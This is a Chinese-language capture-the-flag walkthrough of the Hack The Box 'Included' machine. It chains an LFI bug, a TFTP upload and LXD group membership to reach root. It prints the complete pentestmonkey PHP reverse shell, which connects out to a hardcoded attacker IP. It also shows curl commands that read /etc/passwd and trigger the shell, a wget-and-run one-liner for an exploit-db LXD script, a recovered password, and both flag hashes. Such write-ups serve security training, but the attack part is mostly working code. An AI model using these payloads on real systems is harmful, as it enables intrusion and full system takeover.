[StartingPoint][Tier2]Included

LXD

https://www.hackingarticles.in/lxd-privilege-escalation/

Task 1

What service is running on the target machine over UDP?

(目标机器上通过UDP运行的服务是什么?)

$ nmap -sU 10.129.232.86 -p 69

tftp

Task 2

What class of vulnerability is the webpage that is hosted on port 80 vulnerable to?

(端口80上托管的网页容易受到哪一类漏洞的影响?)

$ nmap -sC -sV 10.129.232.86 --min-rate 1000

$ curl http://10.129.232.86/?file=/etc/passwd

本地文件包含

Local File Inclusion

Task 3

What is the default system folder that TFTP uses to store files?

(TFTP 默认使用的系统文件夹是什么?)

/var/lib/tftpboot/

Task 4

Which interesting file is located in the web server folder and can be used for Lateral Movement?

(位于网络服务器文件夹中且可用于横向移动的有趣文件是哪个?)

简单文件传输协议(TFTP)是一种简单的协议,提供基本的文件传输功能,不需要用户身份验证。TFTP适用于不需要文件传输协议(FTP)提供的复杂交互的应用程序。

缺省情况下,TFTP不需要身份验证。这意味着任何人都可以连接到TFTP服务器并从远程系统上传或下载文件。

我们可以将此链接到我们已经识别的LFI漏洞,以便将恶意PHP代码上传到目标系统,该系统将负责向我们返回一个反向shell。然后我们会访问这个

PHP文件通过LFI和web服务器将执行PHP代码。

//-webshell.php-
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  The author accepts no liability
// for damage caused by this tool.  If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix).  These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.

set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.16.7';  // CHANGE THIS
$port = 10032;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists('pcntl_fork')) {
	// Fork and have the parent process exit
	$pid = pcntl_fork();

	if ($pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}

	if ($pid) {
		exit(0);  // Parent exits
	}

	// Make the current process a session leader
	// Will only succeed if we forked
	if (posix_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}

	$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
	printit("$errstr ($errno)");
	exit(1);
}

// Spawn shell process
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
	printit("ERROR: Can't spawn shell");
	exit(1);
}

// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
	// Check for end of TCP connection
	if (feof($sock)) {
		printit("ERROR: Shell connection terminated");
		break;
	}

	// Check for end of STDOUT
	if (feof($pipes[1])) {
		printit("ERROR: Shell process terminated");
		break;
	}

	// Wait until a command is end down $sock, or some
	// command output is available on STDOUT or STDERR
	$read_a = array($sock, $pipes[1], $pipes[2]);
	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

	// If we can read from the TCP socket, send
	// data to process's STDIN
	if (in_array($sock, $read_a)) {
		if ($debug) printit("SOCK READ");
		$input = fread($sock, $chunk_size);
		if ($debug) printit("SOCK: $input");
		fwrite($pipes[0], $input);
	}

	// If we can read from the process's STDOUT
	// send data down tcp connection
	if (in_array($pipes[1], $read_a)) {
		if ($debug) printit("STDOUT READ");
		$input = fread($pipes[1], $chunk_size);
		if ($debug) printit("STDOUT: $input");
		fwrite($sock, $input);
	}

	// If we can read from the process's STDERR
	// send data down tcp connection
	if (in_array($pipes[2], $read_a)) {
		if ($debug) printit("STDERR READ");
		$input = fread($pipes[2], $chunk_size);
		if ($debug) printit("STDERR: $input");
		fwrite($sock, $input);
	}
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
	if (!$daemon) {
		print "$string\n";
	}
}
?>

$ tftp 10.129.226.19

tftp> put webshell.php

再次验证,的确写入成功

$ curl http://10.129.226.19/?file=php://filter/read=convert.base64-encode/resource=/var/lib/tftpboot/webshell.php|base64 -d

反弹shell

$ curl 'http://10.129.226.19/?file=/var/lib/tftpboot/webshell.php'

$ ls -al /var/www/html

.htpasswd

Task 5

What is the group that user Mike is a part of and can be exploited for Privilege Escalation?

("Mike"用户所属的组,并且可能被利用进行特权提升的是哪个?)

升级shell

$ SHELL=/bin/bash script -q /dev/null

$ cat /var/www/html/.htpasswd

$ su mike

Sheffield19

lxd

Task 6

When using an image to exploit a system via containers, we look for a very small distribution. Our favorite for this task is named after mountains. What is that distribution name?

(在利用容器来攻击系统时,我们寻找一个非常小的发行版。我们用于此任务的最爱被命名为山脉。那个发行版的名称是什么?)

LXD 是 Linux 系统上处理 LXC 容器的管理 API。它会为本地 lxd 组的任何成员执行任务。它不会尝试将调用用户的权限与要执行的功能匹配(LXD 不会根据调用它的用户的权限来限制其执行的功能。换句话说,无论是哪个用户调用了 LXD,它都将执行请求的操作,而不考虑调用用户的权限级别。)。

该漏洞利用了Alpine映像,这是一个基于busy box的轻量级Linux发行版。下载并在本地构建此发行版之后,使用HTTP服务器将其上传到远程系统。然后将映像导入到LXD中,并使用它以root权限挂载Host文件系统

$ searchsploit lxd
$ cp /usr/share/exploitdb/exploits/linux/local/46978.sh ./lxd.sh

alpine

Task 7

What flag do we set to the container so that it has root privileges on the host system?

(我们设置哪个标志给容器,以便在主机系统上拥有 root 权限?)

下载build-alpine

$ wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine

建立alpine

$ chmod a+x build-alpine

$ sudo ./build-alpine

$ python3 -m http.server 80

在靶机上下载,exp.tar.gz和lxd.sh

注意这里的权限是mike的

& cd /tmp;wget http://10.10.16.7/exp.tar.gz;wget http://10.10.16.7/lxd.sh;chmod a+x lxd.sh;./lxd.sh -f exp.tar.gz

security.privileged=true

Task 8

If the root filesystem is mounted at /mnt in the container, where can the root flag be found on the container after the host system is mounted?

(如果容器中的根文件系统挂载在 /mnt,主机系统挂载后,在容器中可以找到根标志在哪里?)

$ cd /mnt/root

/mnt/root/

User Flag

$ find / -name user.txt 2>/dev/nul

$ cat /home/mike/user.txt

a56ef91d70cfbf2cdb8f454c006935a1

Root Flag

$ find / -name root.txt

$ cat /mnt/root/root/root.txt

c693d9c7499d9f572ee375d4c14c7bcf

相关推荐
HEX9CF11 分钟前
【CTF Web】Pikachu xss之href输出 Writeup(GET请求+反射型XSS+javascript:伪协议绕过)
开发语言·前端·javascript·安全·网络安全·ecmascript·xss
小小工匠1 小时前
加密与安全_HOTP一次性密码生成算法
算法·安全·htop·一次性密码
Tandy12356_1 小时前
js逆向——webpack实战案例(一)
前端·javascript·安全·webpack
什么鬼昵称3 小时前
Pikachu-xxe-xxe漏洞
网络·安全·xxe
A 八方4 小时前
【漏洞复现】泛微OA E-Office do_excel.php 任意文件写入漏洞
开发语言·安全·php
x-cmd5 小时前
[241005] 14 款最佳免费开源图像处理库 | PostgreSQL 17 正式发布
数据库·图像处理·sql·安全·postgresql·开源·json
huaqianzkh7 小时前
付费计量系统通用功能(13)
网络·安全·架构
你怎么睡得着的!13 小时前
【web安全】——XSS漏洞
安全·web安全·xss